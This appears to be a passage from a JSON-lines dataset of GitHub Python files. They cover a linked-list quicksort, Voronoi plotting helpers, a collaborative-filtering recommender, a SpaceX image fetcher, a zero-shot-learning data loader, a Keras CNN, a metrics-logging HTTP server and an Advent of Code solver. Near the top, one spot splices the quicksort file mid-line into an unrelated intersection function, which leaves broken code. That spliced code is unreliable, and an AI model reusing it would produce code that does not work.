partition(head,tail):\n if head == tail or not head or not tail:\n return head\n pivot,curr,pivot_data = head,head,tail.data\n while head != tail:\n if head.data < pivot_data:\n pivot = curr\n curr_data = curr.data\n curr.data = head.data\n head.data = curr_data\n curr = curr.next\n head = head.next\n \n curr_data = curr.data\n curr.data = pivot_data\n tail.data = curr_data\n return pivot\n\ndef quickSort(head,tail):\n if not head or head == tail or head == tail.next:\n return\n pivot = partition(head,tail)\n quickSort(head, pivot)\n \n if pivot and pivot == head:\n quickSort(pivot.next, tail)\n elif pivot and pivot.next:\n quickSort(pivot.next.next, tail)\n\ndef printList(root):\n while root:\n print(root.data,end=' ')\n root = root.next\n\ndef solution(L):\n # Write your code here...\n head = construct(L)\n tail = head\n while tail.next:\n tail = tail.next\n quickSort(head, tail)\n printList(head)\n \ntry:\n N=int(input())\n L=[]\n n=0\n for e in input().split():\n if(n= 0 and s <= 1 and t >= 0 and t <= 1:\n intersectionPoint = [x[1] + (x[2] - x[1])*s, y[1] + (y[2] - y[1])*s]\n return intersectionPoint\n \n return None\n\n# Computes the number of elements of lineSet that line intersects\ndef numLineIntersections(lineSet, line):\n count = 0\n for i in range(len(lineSet)):\n if intersection(lineSet[i], line) != None:\n count += 1\n return count\n \n# This allows us to check if a point is inside a given hull (aka set of lines)\ndef isInsideHull(point, hullLines, padding=1000):\n # First, we extend the line up past the edge of the hull\n highestHullPoint = np.max(hullLines[:,1,0]) + padding\n \n # Format our line as [[x1, x2], [y1, y2]]\n extendedLine = np.array([[point[0], point[0]], [point[1], highestHullPoint]])\n \n intersectionCount = numLineIntersections(hullLines, extendedLine)\n \n # If a line intersects with the boundary of a shape an even number of times\n # in total, it must be outside that shape (think Qext for Gauss's Law)\n if intersectionCount % 2 == 0:\n return False\n\n # Otherwise it is inside\n return True\n\n# This method allows us to get rid of excess lines in the picture\ndef cullVoronoi(vor: Voronoi, communities, hullLines):\n # We can't know how many lines will be good in advance, so we just\n # start with an empty array and append as we go\n goodLines = []\n \n # We iterate over all of the ridges (lines) in the voronoi tessellation\n for k, v in vor.ridge_dict.items():\n # The key will be a tuple with the indices of the two points this line divides\n # The value will be an array with the indices of the two vertices that define the line\n \n # If they are in the same community, we don't need to draw that line\n # Otherwise, we do\n if communities[k[0]] != communities[k[1]]:\n # We don't care about lines that extend to infinity, so ignore those\n # (scipy's library will give -1 as the index of the vertex if it extends to infinity)\n if v[0] == -1 or v[1] == -1:\n pass\n else:\n v1 = vor.vertices[v[0]]\n v2 = vor.vertices[v[1]]\n\n # Make sure that the vertex is actually inside the shape, and not really far away\n if not isInsideHull(v1, hullLines) or not isInsideHull(v2, hullLines):\n pass\n else:\n # Line format: [[x1, x2], [y1, y2]]\n goodLines.append([[v1[0], v2[0]], [v1[1], v2[1]]])\n\n return np.array(goodLines)\n\n\n# Some methods to help visualize things\ndef drawPoints(ax, pointArr, communities, colors, s=10, noaxis=True):\n# for i in range(len(pointArr)):\n# ax.scatter(pointArr[i,0], pointArr[i,1],\n# color=colors[communities[i]], s=s)\n # We can do this a bit 
more efficiently by coloring all of the points in a given community\n # at once\n for comIndex in range(max(communities)+1):\n pointsInCommunity = pointArr[communities == comIndex]\n ax.scatter(pointsInCommunity[:,0], pointsInCommunity[:,1], color=colors[comIndex], s=s)\n\n if noaxis:\n ax.set_yticks([])\n ax.set_xticks([])\n\ndef drawLines(ax, lines, color='black', opacity=1):\n for i in range(len(lines)):\n ax.plot(lines[i,0], lines[i,1], c=color, alpha=opacity)\n\ndef rgb_to_hex(rgb):\n return '%02x%02x%02x' % rgb\n\ndef genRandomColors(size, seed=21):\n np.random.seed(seed)\n\n randomColors = [f\"#{rgb_to_hex(tuple(np.random.choice(range(256), size=3).flatten()))}\" for i in range(size)]\n\n return randomColors\n\ndef mapPointToColor(point):\n if len(np.shape(point)) == 1:\n # We'll vary red across x, green across y, and blue across both\n # Turns out the trig approach doesn't really work, so we'll just\n # use a (mostly) linear gradient\n #red = int(np.cos(frequencyX*point[0])*127) + 128\n #green = int(np.cos(frequencyY*point[1])*127) + 128\n #blue = int(np.sin(frequencyX*point[0] + frequencyY*point[1])*127) + 128\n # These are just the approximate boundaries of our region\n #extremaX = [640300, 643500]\n #extremaY = [3969000, 3972000]\n #r = int((point[0] - extremaX[0]) / (extremaX[1] - extremaX[0]) * 255)\n #g = int((point[1] - extremaY[0]) / (extremaY[1] - extremaY[0]) * 255)\n #b = int((point[0] % 1000 ) * 128/1000 + (point[1] % 1000 ) * 128/1000)\n seed = int(np.sqrt(point[0]*point[1]/3))\n #print(seed)\n np.random.seed(seed)\n r, g, b = np.random.randint(0, 255, size=3)\n return f'#{rgb_to_hex(tuple([r,g,b]))}'\n\n # Otherwise recurse to retrieve list of colors\n colors = []\n for i in range(len(point)):\n colors.append(mapPointToColor(point[i]))\n\n return colors\n \n","repo_name":"Jfeatherstone/CommunityDetectionVis","sub_path":"vis/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70272873051","text":"import numpy as np\r\nimport pandas as pd\r\nimport scipy\r\nfrom scipy import spatial\r\n\r\nclass CollaborativeFilter:\r\n def __init__(self, dataframe, colItems, colUsers):\r\n self.dataframe = dataframe\r\n self.colItems = colItems\r\n self.colUsers = colUsers\r\n self.cleanDF = self.cleanDataframe()\r\n\r\n # Simplify dataframe to only contain users and items that they have viewed, and remove duplicates\r\n def cleanDataframe(self):\r\n itemUserDF = self.dataframe[[self.colItems, self.colUsers]]\r\n return itemUserDF.drop_duplicates()\r\n\r\n # Gets list of all unique users from filtered criteria\r\n def getUserList(self):\r\n userList = list(set(self.cleanDF[self.colUsers]))\r\n return userList\r\n\r\n # Gets list of all unique items from filtered criteria\r\n def getItemList(self):\r\n itemUserDict = self.cleanDF.groupby(self.colItems)[self.colUsers].apply(list).to_dict()\r\n itemList = [item for item in itemUserDict]\r\n return itemList\r\n\r\n # Builds a matrix denoting the items and which users have viewed them\r\n # Each row is a unique item, with a binary 0-1 entry for whether a user (column) has\r\n # viewed that item or not\r\n def buildItemUserMatrix(self):\r\n userList = self.getUserList()\r\n itemList = self.getItemList()\r\n\r\n itemUserDict = self.cleanDF.groupby(self.colItems)[self.colUsers].apply(list).to_dict()\r\n userIndexDict = dict(zip(userList, range(len(userList))))\r\n\r\n itemUserMatrix = []\r\n nUsers = 
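A hedged usage sketch for the Voronoi-culling and drawing helpers above. The points, community labels, and square hull are invented for illustration, and it assumes the `intersection` helper whose opening lines are truncated in this record:

import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial import Voronoi

points = np.random.rand(50, 2)                   # hypothetical point cloud
communities = (points[:, 0] > 0.5).astype(int)   # two made-up communities
# A unit-square hull, in the same [[x1, x2], [y1, y2]] line format used above.
hullLines = np.array([[[0, 1], [0, 0]], [[1, 1], [0, 1]],
                      [[1, 0], [1, 1]], [[0, 0], [1, 0]]])

vor = Voronoi(points)
goodLines = cullVoronoi(vor, communities, hullLines)  # keep only inter-community ridges

fig, ax = plt.subplots()
drawPoints(ax, points, communities, colors=['red', 'blue'])
drawLines(ax, goodLines)
plt.show()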
len(userList)\r\n for item in itemList:\r\n itemVector = np.zeros(nUsers, dtype=int)\r\n userIdList = itemUserDict.get(item)\r\n userIndices = [userIndexDict.get(user) for user in userIdList]\r\n itemVector[userIndices] = 1\r\n itemUserMatrix.append(itemVector)\r\n return itemUserMatrix, itemList, userList\r\n\r\n # Constructs a square similarity matrix for similarities between all items\r\n def buildSimilarityMatrix(self, itemUserMatrix, metric=\"cosine\"):\r\n nItems = len(itemUserMatrix)\r\n simMatrix = np.zeros([nItems, nItems])\r\n\r\n for i in range(nItems):\r\n for j in range(nItems):\r\n itemViews1 = itemUserMatrix[i]\r\n itemViews2 = itemUserMatrix[j]\r\n\r\n if metric == \"cosine\":\r\n itemSimilarity = self.calculateCosineSimilarity(itemViews1, itemViews2)\r\n elif metric == \"pearson\":\r\n itemSimilarity = self.calculatePearsonCorrelation(itemViews1, itemViews2)\r\n elif metric == \"spearman\":\r\n itemSimilarity = self.calculateSpearmanRankCorrelation(itemViews1, itemViews2)\r\n elif metric == \"euclidean\":\r\n itemSimilarity = self.calculateEuclideanSimilarity(itemViews1, itemViews2)\r\n else:\r\n print(\"# Error: Invalid similarity metric specified #\")\r\n simMatrix[i][j] = itemSimilarity\r\n if i % 100 == 0: print(\"Sim matrix progress: \", i, \"/\", nItems)\r\n\r\n return simMatrix\r\n\r\n # Generates a list of recommendations for a user\r\n # Proposed list of items are most similar to the items that the user previously viewed\r\n def makeRecommendation(self, user, itemList, similarityMatrix, nRecommend):\r\n viewedItems = self.cleanDF[self.cleanDF[self.colUsers] == user][self.colItems]\r\n viewedIndices = [itemList.index(vi) for vi in viewedItems] # Finds index of viewed items in itemList\r\n simRows = [similarityMatrix[vid] for vid in viewedIndices]\r\n colSums = np.sum(simRows, 0)\r\n\r\n for vi in sorted(viewedIndices, reverse=True):\r\n colSums[vi] = 0\r\n\r\n nearestItemIndices = np.argsort(-colSums)\r\n recomItemIndices = nearestItemIndices[:nRecommend]\r\n recomItems = [itemList[i] for i in recomItemIndices]\r\n\r\n return recomItems\r\n\r\n def createRecommenderDict(self, userList, itemList, similarityMatrix, nRecommend):\r\n recommenderDict = {}\r\n for user in userList:\r\n recomItems = self.makeRecommendation(user, itemList, similarityMatrix, nRecommend)\r\n recommenderDict[user] = recomItems\r\n\r\n return recommenderDict\r\n\r\n\r\n def calculateCosineSimilarity(self, vec1, vec2):\r\n cosDistance = spatial.distance.cosine(vec1, vec2)\r\n itemSimilarity = 1 - cosDistance\r\n return itemSimilarity\r\n\r\n\r\n def calculatePearsonCorrelation(self, vec1, vec2):\r\n pearsonCorrelation = scipy.stats.pearsonr(vec1, vec2)\r\n return pearsonCorrelation[0]\r\n\r\n\r\n def calculateSpearmanRankCorrelation(self, vec1, vec2):\r\n spearmanCorrelation = scipy.stats.spearmanr(vec1, vec2)\r\n return spearmanCorrelation[0]\r\n\r\n\r\n def calculateEuclideanSimilarity(self, vec1, vec2):\r\n euclideanDistance = spatial.distance.euclidean(vec1, vec2)\r\n itemSimilarity = 1 - euclideanDistance\r\n return itemSimilarity\r\n","repo_name":"dan-lin/AdaptiveHybridRS","sub_path":"CollaborativeFilter.py","file_name":"CollaborativeFilter.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"538848042","text":"import requests\n\nfrom file_operations import download_image, get_file_extension_from_link\n\nLAUNCH_ID = \"6243ad8baf52800c6e919252\"\nIMAGES_DIR = \"images/\"\n\n\ndef 
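A minimal, hypothetical usage sketch for the CollaborativeFilter class above; the DataFrame, column names, and user id are invented for illustration:

import pandas as pd

views = pd.DataFrame({
    "item": ["a", "a", "b", "b", "c"],   # hypothetical view log
    "user": [1, 2, 1, 3, 2],
})
cf = CollaborativeFilter(views, colItems="item", colUsers="user")
matrix, items, users = cf.buildItemUserMatrix()
sim = cf.buildSimilarityMatrix(matrix, metric="cosine")
# User 1 has seen items a and b; the remaining item most similar to them is suggested.
print(cf.makeRecommendation(1, items, sim, nRecommend=1))  # e.g. ['c']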
fetch_spacex_launch(launch_id: str) -> None:\n \"\"\"Fetch SpaceX launch images by launch_id.\"\"\"\n response = requests.get(\n url=f\"https://api.spacexdata.com/v4/launches/{launch_id}\"\n )\n spacex_launches = response.json()\n spacex_image_links = spacex_launches[\"links\"][\"flickr\"][\"original\"]\n for index, link in enumerate(spacex_image_links, start=1):\n download_image(\n url=link,\n path=IMAGES_DIR,\n name=f\"spacex_launch_{launch_id}_{index}{get_file_extension_from_link(link)}\"\n )\n\n\ndef main():\n fetch_spacex_launch(LAUNCH_ID)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"VrHb/Astrophoto_collecting","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42817013144","text":"from skimage import io, transform\nfrom PIL import Image\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pickle\n\nimg_width = 224\nimg_height = 224\npickle_load_file = open('./Data/pickledata/train_and_vali_file_list.pkl', 'rb')\ntemp_list = pickle.load(pickle_load_file)\ntrain_file_list, vali_file_list = temp_list[0], temp_list[1]\ntrain_file_len, vali_file_len = len(train_file_list), len(vali_file_list)\nprint(train_file_len,vali_file_len)\nclasses_list = temp_list[2]\nclasses_new_list = temp_list[3]\nclasses_new_dict = {item:index for index, item in enumerate(classes_new_list)}\nattribute_list = temp_list[4]\nattribute_bi_dict = temp_list[5]\nattribute_conti_dict = temp_list[6]\n\nattribute_list_all = np.zeros((25,85))\n\nfor index, each_class in enumerate(classes_new_list):\n\tattribute_list_all[index,:] = attribute_bi_dict[each_class]\n\nattribute_list_all = attribute_list_all.astype('float32')\n\nword2vec_load_file = open('./glove/word2vec_pickle.pkl','rb')\nword2vec_list = pickle.load(word2vec_load_file)\nword2vec_50 = word2vec_list[0]\nword2vec_100 = word2vec_list[1]\nword2vec_200 = word2vec_list[2]\nword2vec_300 = word2vec_list[3]\n\ndef image2tensor(image_path_name):\n\timg = mpimg.imread(image_path_name)\n\tnew_image = transform.resize(img, (img_width, img_height))\n\t# new_image_ = np.asarray(new_image)\n\t# new_image = tf.convert_to_tensor(new_image)\n\treturn new_image\n\ndef glove(word, vec_length):\n\tif vec_length == 50:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_50[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(50)\n\telif vec_length == 100:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_100[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(100)\n\telif vec_length == 200:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_200[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(200)\n\telif vec_length == 300:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_300[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(300)\n\telse:\n\t\tprint('vec_length should be 50, 100, 200, or 300!')\n\t\treturn 0\n\treturn word2vec\n\n\n\ndef Get_next_batch(Train_or_Vali, batch_size, epoch, use_word2vec=0, attribute = 'conti'):\n\t\"\"\"\n\tGet next batch according to size.\n\t:param Train_or_Vali: Whether to train or validate the model.\n\t:param batch_size: The size of the training batch.\n\t:param use_word2vec: Whether to use the word2vec feature as an attribute\n\t:return: training data, shape = [batch_size, img_width, img_height, 3],\n\tattribute, shape = [batch_size, attribute_length]\n\tand label (one-hot), shape = [batch_size, num_classes]\n\tfor the next batch; all returned as np.array.\n\t\"\"\"\n\timg_batch_tensor = np.zeros((batch_size, img_width, img_height, 3))\n\tif not use_word2vec:\n\t\tattribute_batch_tensor = np.ndarray((batch_size, 85))\n\telse:\n\t\tattribute_batch_tensor = np.ndarray((batch_size, 85 + use_word2vec))\n\t# if not use_all_label:\n\t# \tlabel_batch_tensor = np.ndarray((batch_size, 20))\n\t# else:\n\tlabel_batch_tensor = np.zeros((batch_size, 25))\n\n\n\tif Train_or_Vali == 'train':\n\t\timg_path = './Data/train_zsl/'\n\t\tfor batch in range(batch_size):\n\t\t\tfile_name = train_file_list[(batch_size*epoch + batch)%train_file_len]\n\t\t\timg_batch_tensor[batch] = image2tensor(img_path + file_name)\n\t\t\tlabel_name = file_name.split('_')[0]\n\t\t\tif attribute == 'bi':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_bi_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_bi_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\telif attribute == 'conti':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_conti_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_conti_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\tlabel_batch_tensor[batch][classes_new_dict[label_name]] = 1 \n\n\telif Train_or_Vali == 'validation':\n\t\timg_path = './Data/validation_zsl/'\n\t\tfor batch in range(batch_size):\n\t\t\tfile_name = vali_file_list[(batch_size*epoch + batch)%vali_file_len]\n\t\t\timg_batch_tensor[batch] = image2tensor(img_path + file_name)\n\t\t\tlabel_name = file_name.split('_')[0]\n\t\t\tif attribute == 'bi':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_bi_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_bi_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\telif attribute == 'conti':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_conti_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_conti_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\tlabel_batch_tensor[batch][classes_new_dict[label_name]] = 1\n\telse:\n\t\tprint(\"ERROR! You should input train or validation\")\n\n\treturn img_batch_tensor.astype('float32'), attribute_batch_tensor.astype('float32'), label_batch_tensor.astype('float32')\n\ndef main():\n\tprint('test:')\n\tprint('*' * 30)\n\timage_name = 'pic1.jpg'\n\tresult = image2tensor(image_name)\n\tGet_next_batch('train', 2, 1)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"ChengzheXu/exercise_ZSL","sub_path":"Code/image_data_handle.py","file_name":"image_data_handle.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"38136523337","text":"def crear_modeloEmbeddings():\n from tensorflow.keras import optimizers\n from tensorflow.keras.models import Sequential\n from tensorflow.keras.layers import Dropout, Flatten, Dense, Activation\n from tensorflow.keras.layers import BatchNormalization\n from tensorflow.keras.layers import Convolution2D, MaxPooling2D\n from tensorflow.keras import backend as K\n longitud, altura = 250, 250\n filtrosConv1 = 32\n filtrosConv2 = 64\n tamano_filtro1 = (3, 3)\n tamano_filtro2 = (2, 2)\n 
tamano_pool = (2, 2)\n clases = 2\n lr = 0.0004\n\n cnn = Sequential()\n cnn.add(Convolution2D(filtrosConv1, tamano_filtro1, padding =\"same\", input_shape=(longitud, altura, 3), activation='relu'))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Convolution2D(filtrosConv2, tamano_filtro2, padding =\"same\"))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Convolution2D(filtrosConv2, tamano_filtro2, padding =\"same\"))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Flatten())\n cnn.add(Dense(256, activation='relu'))\n\n cnn.add(Dense(128, activation='relu'))\n\n cnn.add(Dense(64, activation='relu'))\n cnn.add(BatchNormalization())\n\n cnn.add(Dense(clases, activation='softmax'))\n\n cnn.compile(loss='binary_crossentropy',\n optimizer=optimizers.Adam(\n learning_rate=lr,\n ),\n metrics=['accuracy'])\n\n return cnn","repo_name":"jmurillo064/servicioRoya","sub_path":"utiles.py","file_name":"utiles.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25532294310","text":"import threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time\nimport csv\nimport os\n\nnavigationTime= {'fetchTime':0 , 'workerTime':0 , 'totalTime':0, 'downloadTime':0, 'timeToFirstByte':0, 'headerSize':0, 'dnsLookupTime': 0}\nnetworkInf = {'downlink': 0, 'effectiveType': 0, 'rtt':0, 'saveData':False}\nstorageEstimate = {'quota':0, 'usage':0, 'caches':0, 'indexedDB':0, 'serviceWorker':0}\nfpResult = {'fp':0}\nfcpResult = {'fcp':0}\nfidResult = {'fid':0}\nlcpResult = {'lcp':0}\nclsResult = {'cls':0}\ntbtResult = {'tbt':0}\nhttpd = 0\n\nclass TestHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n length = int(self.headers['Content-Length']) # <--- Gets the size of data\n data_string = self.rfile.read(length)\n data_string = data_string.decode(\"utf-8\")\n print(\"\\nTEST\\n\")\n if 'perfumeResults' in data_string:\n print(data_string)\n if 'navigationTiming' in data_string:\n navigationTime['fetchTime'] = data_string.split(\"fetchTime\\\":\")[1].split(\",\\\"workerTime\")[0]\n navigationTime['workerTime'] = data_string.split(\"workerTime\\\":\")[1].split(\",\\\"totalTime\")[0]\n navigationTime['totalTime'] = data_string.split(\"totalTime\\\":\")[1].split(\",\\\"downloadTime\")[0]\n navigationTime['downloadTime'] = data_string.split(\"downloadTime\\\":\")[1].split(\",\\\"timeToFirstByte\")[0]\n navigationTime['timeToFirstByte'] = data_string.split(\"timeToFirstByte\\\":\")[1].split(\",\\\"headerSize\")[0]\n navigationTime['headerSize'] = data_string.split(\"headerSize\\\":\")[1].split(\",\\\"dnsLookupTime\")[0]\n navigationTime['dnsLookupTime'] = data_string.split(\"dnsLookupTime\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n #if 'networkInformation' in data_string:\n # networkInf['downlink'] = data_string.split(\"downlink\\\":\")[1].split(\",\\\"effectiveType\")[0]\n # networkInf['effectiveType'] = data_string.split(\"effectiveType\\\":\\\"\")[1].split(\"\\\",\\\"rtt\")[0]\n # networkInf['rtt'] = data_string.split(\"rtt\\\":\")[1].split(\",\\\"saveData\")[0]\n # networkInf['saveData'] = data_string.split(\"saveData\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n if 'storageEstimate' in data_string:\n storageEstimate['quota'] = data_string.split(\"quota\\\":\")[1].split(\",\\\"usage\")[0]\n storageEstimate['usage'] = data_string.split(\"usage\\\":\")[1].split(\",\\\"caches\")[0]\n storageEstimate['caches'] = 
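A hedged usage sketch for the `crear_modeloEmbeddings` factory above (assumes TensorFlow is installed; the data directory and generator settings are placeholders). As a design note, with a 2-unit softmax output, `categorical_crossentropy` is the more conventional pairing than the `binary_crossentropy` the function compiles with:

from tensorflow.keras.preprocessing.image import ImageDataGenerator

model = crear_modeloEmbeddings()
model.summary()

# Hypothetical training data: one subfolder per class under ./data/train.
gen = ImageDataGenerator(rescale=1.0 / 255)
train_flow = gen.flow_from_directory("./data/train", target_size=(250, 250),
                                     batch_size=32, class_mode="categorical")
model.fit(train_flow, epochs=5)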
data_string.split(\"caches\\\":\")[1].split(\",\\\"indexedDB\")[0]\n storageEstimate['indexedDB'] = data_string.split(\"indexedDB\\\":\")[1].split(\",\\\"serviceWorker\")[0]\n storageEstimate['serviceWorker'] = data_string.split(\"serviceWorker\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n if 'fp' in data_string:\n fpResult['fp'] = data_string.split(\"fp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'fcp' in data_string:\n fcpResult['fcp'] = data_string.split(\"fcp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'fid' in data_string:\n fidResult['fid'] = data_string.split(\"fid\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'lcp' in data_string:\n lcpResult['lcp'] = data_string.split(\"lcp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'cls' in data_string:\n clsResult['cls'] = data_string.split(\"cls\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'tbt' in data_string:\n tbtResult['tbt'] = data_string.split(\"tbt\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n outputDir = \"output\"\n\n if not os.path.exists(outputDir):\n os.makedirs(outputDir)\n else:\n print(\"The output directory already exists\")\n try:\n file2 = open(outputDir + '/MyFile2_results_{}.txt'.format(time.strftime('%Y.%m.%d_%H%M%S')),\"w+\")\n file2.write(data_string)\n with open(outputDir + '/navigationTiming_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, navigationTime.keys())\n w.writeheader()\n w.writerow(navigationTime)\n #with open(outputDir + '/networkInformation_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n # w = csv.DictWriter(f, networkInf.keys())\n # w.writeheader()\n # w.writerow(networkInf)\n with open(outputDir + '/storageEstimate_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, storageEstimate.keys())\n w.writeheader()\n w.writerow(storageEstimate)\n with open(outputDir + '/fp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, fpResult.keys())\n w.writeheader()\n w.writerow(fpResult)\n with open(outputDir + '/fcp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, fcpResult.keys())\n w.writeheader()\n w.writerow(fcpResult)\n with open(outputDir + '/fid_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, fidResult.keys())\n w.writeheader()\n w.writerow(fidResult)\n with open(outputDir + '/lcp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, lcpResult.keys())\n w.writeheader()\n w.writerow(lcpResult)\n with open(outputDir + '/cls_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, clsResult.keys())\n w.writeheader()\n w.writerow(clsResult)\n with open(outputDir + '/tbt_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.DictWriter(f, tbtResult.keys())\n w.writeheader()\n w.writerow(tbtResult)\n\n print(data_string)\n\n except:\n print('Error while writing results files')\n\n if \"load\" in 
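The nine near-identical `with open(...)` blocks above could be collapsed into a single helper; this is a sketch of that refactor with the same behavior, assuming the same module-level result dicts (`write_results` and its parameters are hypothetical names, not part of the original script):

def write_results(out_dir, stamp, named_dicts):
    # named_dicts maps a file prefix to the dict to dump, e.g. {"fp": fpResult}.
    for name, data in named_dicts.items():
        path = f"{out_dir}/{name}_results_{stamp}.csv"
        with open(path, "w") as f:
            w = csv.DictWriter(f, data.keys())
            w.writeheader()
            w.writerow(data)

# write_results(outputDir, time.strftime('%Y.%m.%d_%H%M%S'),
#               {"navigationTiming": navigationTime, "storageEstimate": storageEstimate,
#                "fp": fpResult, "fcp": fcpResult, "fid": fidResult,
#                "lcp": lcpResult, "cls": clsResult, "tbt": tbtResult})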
data_string:\n load_time = data_string.split(\"load\\\":\")[1].split(\"}]}\")[0]\n print(outputDir + '/loadTime_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')))\n with open(outputDir + '/loadTime_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x\n w = csv.writer(f, delimiter=\"\\n\")\n w.writerow([\"load_time\"])\n w.writerow([load_time])\n\n self.wfile.write(b'')\n\ndef start_server():\n \"\"\"Start the server.\"\"\"\n server_address = ('', 8080)\n global httpd\n httpd = HTTPServer(server_address, TestHandler)\n print(\"Serving on CWD: \" + os.getcwd())\n httpd.serve_forever()\n\ndef stop_server():\n \"\"\"Stop the server.\"\"\"\n global httpd\n httpd.server_close()\n\nif __name__ == '__main__':\n start_server()\n time.sleep(10)\n stop_server()\n","repo_name":"HermanKelder/GreenLabProject","sub_path":"scripts/NewServer.py","file_name":"NewServer.py","file_ext":"py","file_size_in_byte":7688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25434803332","text":"file = open(\"input/day-17-input.txt\")\nlines = file.readlines()[0].strip()\n\ntrench_y = lines.find(\"y\")\ntrench_x = list(map(lambda n : int(n), lines[15:trench_y - 2].split(\"..\")))\ntrench_y = list(map(lambda n : int(n) ,lines[trench_y + 2:].split(\"..\")))\n\nmax_ys = []\n\nfor x in range(1, trench_x[1] + 1):\n for y in range(-1000, 1000):\n x_change, y_change = x, y\n x_pos, y_pos = 0, 0\n y_max = 0\n while x_pos <= trench_x[1] and y_pos >= trench_y[0]:\n x_pos += x_change\n y_pos += y_change\n x_change = x_change - 1 if x_change > 0 else 0\n y_change -= 1\n y_max = max(y_pos, y_max)\n\n if trench_x[0] <= x_pos <= trench_x[1] and trench_y[0] <= y_pos <= trench_y[1]:\n max_ys.append(y_max)\n break\n\nresult = max(max_ys)\nprint(\"highest y position: {}\".format(result)) # part 1\nprint(\"number of initial velocities: {}\".format(len(max_ys))) # part 2\n","repo_name":"xiongjya/aoc-2021","sub_path":"src/day-17/day-17-0.py","file_name":"day-17-0.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7736303497","text":"\nimport simplejson, socket, sys, pyglet\nfrom . import settings\nfrom . import game\n \nclass 